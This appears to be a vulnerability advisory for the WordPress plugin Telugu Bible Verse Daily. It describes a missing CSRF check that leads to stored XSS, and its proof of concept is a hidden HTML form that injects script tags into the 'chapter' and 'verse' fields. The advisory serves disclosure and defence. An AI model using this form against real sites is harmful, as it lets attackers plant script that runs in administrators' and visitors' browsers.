WordPress Plugin Vulnerabilities
Telugu Bible Verse Daily <= 1.0 - CSRF to Stored XSS
Description
The plugin is lacking any CSRF check when saving its settings and verses, and do not sanitise or escape them when outputting them back in the page. This could allow attackers to make a logged in admin change the settings, as well as add malicious verses containing JavaScript code in them, leading to Stored XSS issues
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/options-general.php?page=telugu-bible-verse-daily%2FTeluguBibleVersedisplay.php" method="POST"> <input type="hidden" name="tvd_post_type" value="fav" /> <input type="hidden" name="tvd_connection" value="fopen" /> <input type="hidden" name="chapter" value="<script>alert(/XSS1/)</script>" /> <input type="hidden" name="verse" value="<script>alert(/XSS2/)</script>" /> <input type="hidden" name="verse_add" value="Add Verse »" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Ashish Upsham
Submitter
Ashish
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-07-19 (about 2 years ago)
Added
2021-07-19 (about 2 years ago)
Last Updated
2023-01-23 (about 1 years ago)